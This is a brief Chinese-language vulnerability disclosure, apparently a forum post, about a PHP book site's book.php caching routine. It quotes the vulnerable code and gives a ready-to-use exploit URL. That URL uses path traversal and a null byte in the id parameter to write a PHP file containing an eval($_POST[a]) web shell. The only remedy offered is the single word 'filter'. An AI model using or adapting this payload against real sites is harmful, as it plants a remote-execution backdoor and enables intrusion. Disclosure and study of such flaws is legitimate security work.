很傻比的一漏洞
必须开启缓存才能利用
先看代码
book.php
$kd_cachedir = "./cache";
if($kd_book_cache=="ture"){//缓存必须开启
$lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
// echo $lastflesh;
if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60) <= time())){
ob_start();
include "./templates/$kd_moban/book.html";
$mianfei = ob_get_contents();
ob_end_clean();
file_put_contents("./cache/book$shuid.html",$mianfei);
echo file_get_contents($kd_cachedir."/book$shuid.html");
}else{
echo file_get_contents("./cache/book$shuid.html");

}
}else{
include "./templates/$kd_moban/book.html";
}

?>
exp:http://www.badguest.cn /book.php?id=/../../1.php%00“><?php eval($_POST[a])?>

修复：过滤